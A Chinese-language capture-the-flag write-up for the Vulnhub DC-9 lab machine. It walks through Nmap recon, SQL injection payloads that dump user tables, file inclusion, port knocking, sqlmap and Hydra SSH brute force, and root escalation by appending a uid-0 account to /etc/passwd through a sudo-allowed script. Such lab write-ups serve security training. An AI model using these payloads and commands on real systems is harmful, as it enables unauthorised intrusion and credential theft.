Vulnhub DC-9靶场WriteUP

Recon

首先使用netdiscover扫描靶机,靶机IP地址为192.168.244.135。

┌──(kali㉿kali)-[~]
└─$ sudo netdiscover -r 192.168.244.0/24
 Currently scanning: 192.168.244.0/24   |   Screen View: Unique Hosts                                                        
 
 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                                             
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.244.1   00:50:56:c0:00:08      1      60  VMware, Inc.                                                              
 192.168.244.2   00:50:56:f7:b2:38      1      60  VMware, Inc.                                                              
 192.168.244.135 00:0c:29:e4:f7:0d      1      60  VMware, Inc.                                                              
 192.168.244.254 00:50:56:ed:d6:50      1      60  VMware, Inc.   

随后使用Nmap对靶机进行扫描,发现22端口被过滤,80端口开启。

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sF 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 04:04 EST
Nmap scan report for 192.168.244.135
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE         SERVICE
22/tcp filtered      ssh
80/tcp open|filtered http
MAC Address: 00:0C:29:E4:F7:0D (VMware)

Nmap done: 1 IP address (1 host up) scanned in 14.40 seconds

Sql Inject

尝试访问Web服务。

Vulnhub DC-9靶场WriteUP_第1张图片

在Search部分测试SQL注入。

Vulnhub DC-9靶场WriteUP_第2张图片

使用order by猜测列数,得出返回6列数据。

Vulnhub DC-9靶场WriteUP_第3张图片

通过union select获得列数。

Vulnhub DC-9靶场WriteUP_第4张图片

获取数据库名和当前数据库版本。

Vulnhub DC-9靶场WriteUP_第5张图片

获得当前数据库中存在的表名。

Fred' union select 1,2,3,4,database(),group_concat(table_name) from information_schema.tables where table_schema=database();#
Vulnhub DC-9靶场WriteUP_第6张图片

查看表的字段名。

Fred' union select 1,2,3,4,5,group_concat(UserID,Username,Password) from Staff.Users;#
Vulnhub DC-9靶场WriteUP_第7张图片

获得用户名和密码Hash后,对Hash进行破解,然后在Web界面登录。

用户名密码为:admin:transorbital1
Vulnhub DC-9靶场WriteUP_第8张图片

通过Manage界面的File does not exist,我们猜测文件包含漏洞。通过BurpSuite进行爆破尝试。

Vulnhub DC-9靶场WriteUP_第9张图片
Vulnhub DC-9靶场WriteUP_第10张图片
这里需要注意,发送请求时不能URL编码Payload。

接下来的我们获得了用户名,但是SSH端口并没有开启,在/etc下我们发现了/etc/knockd.conf,Knockd保护了SSH端口的开启与关闭,根据Knockd的配置,我们只有按顺序访问指定端口,才能开启SSH端口。

Vulnhub DC-9靶场WriteUP_第11张图片

根据配置文件我们可知,按顺序访问7469,8475,9842端口可以打开SSH端口。我们可以用nc或nmap来Knock。

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 7469
(UNKNOWN) [192.168.244.135] 7469 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 8475
(UNKNOWN) [192.168.244.135] 8475 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ nc 192.168.244.135 9842
(UNKNOWN) [192.168.244.135] 9842 (?) : Connection refused

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -p22 192.168.244.135
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-05 06:20 EST
Nmap scan report for 192.168.244.135
Host is up (0.0011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
MAC Address: 00:0C:29:E4:F7:0D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.69 seconds

Brute

我们现在已经开了SSH端口,但我们没有SSH的用户名与密码,我们尝试sqlmap,将数据库的内容导出,尝试爆破SSH用户和密码。我们首先将注入点的HTTP请求内容保存至文件。

POST /results.php HTTP/1.1
Host: 192.168.244.135
Content-Length: 21
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.244.135
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.244.135/search.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

search=%27or+1%3D1%23

然后使用如下命令导出表中内容。

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ sqlmap -r inject.txt -D users -T UserDetails --dump  
······

[06:54:44] [INFO] table 'users.UserDetails' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv'

随即处理文件内容然后进行爆破。

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ mv /home/kali/.local/share/sqlmap/output/192.168.244.135/dump/users/UserDetails.csv ./user.txt

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "3" > passwd.lst

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ cut user.txt -d "," -f "5" > user.lst  

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P passwd.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 06:57:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: chandlerb   password: UrAG0D!
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
[22][ssh] host: 192.168.244.135   login: janitor   password: Ilovepeepee
[STATUS] 341.00 tries/min, 341 tries in 00:01h, 21 to do in 00:01h, 15 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 06:58:08

获得密码后,我们尝试登录提权。三个账户都没有sudo权限,但janitor用户目录下有隐藏文件。

janitor@dc-9:~$ ls -la
total 16
drwx------  4 janitor janitor 4096 Mar  5 21:57 .
drwxr-xr-x 19 root    root    4096 Dec 29  2019 ..
lrwxrwxrwx  1 janitor janitor    9 Dec 29  2019 .bash_history -> /dev/null
drwx------  3 janitor janitor 4096 Mar  5 21:57 .gnupg
drwx------  2 janitor janitor 4096 Dec 29  2019 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt 
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts

我们使用这些密码再次进行爆破。

┌──(kali㉿kali)-[~/Labs/DC-9]
└─$ hydra -L user.lst -P newpass.lst ssh://192.168.244.135
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-05 07:06:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.244.135:22/
[22][ssh] host: 192.168.244.135   login: fredf   password: B4-Tru3-001
[22][ssh] host: 192.168.244.135   login: joeyt   password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-05 07:06:27

查看sudo -l权限。

fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fredf may run the following commands on dc-9:
    (root) NOPASSWD: /opt/devstuff/dist/test/test

进入到该可执行文件的上层目录查看test.py的源码。

#!/usr/bin/python

import sys

if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)

else :
    f = open(sys.argv[1], "r")
    output = (f.read())

    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()

通过分析源码,我们知道该程序接收三个参数,读取第二个参数并写入第三个参数,那么我们就可以构造一个拥有root权限的用户写入/etc/passwd文件中,从而提权。我们首先通过程序读取shadow文件的内容,获得一个我们已知密码的用户。

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /etc/shadow ./shadow
fredf@dc-9:/opt/devstuff$ cat shadow 
······
janitor:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:18259:0:99999:7:::

我们修改这条内容为如下内容。并保存在/tmp/test下。

hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash

然后通过test程序进行写入(请使用单引号),并su提权(这里要提交janitor的密码)。

fredf@dc-9:/opt/devstuff$ echo 'hacker:$6$bQhC0fZ9g9313Aat$aZ0GecSMTi1qUGqSF6eAdGu2pDXRg1Zu8JzLyyhvSAwh8MnLzv3XPnu6Vw9OruPsgAGgA2dCYdOuk9T4hgDZ6/:0:0:root:/root:/bin/bash' > /tmp/test

fredf@dc-9:/opt/devstuff$ sudo ./dist/test/test /tmp/test /etc/passwd

fredf@dc-9:/opt/devstuff$ su hacker

提权后成功获得FLAG。

Vulnhub DC-9靶场WriteUP_第12张图片

你可能感兴趣的:(靶场,网络安全,web安全,系统安全,计算机网络)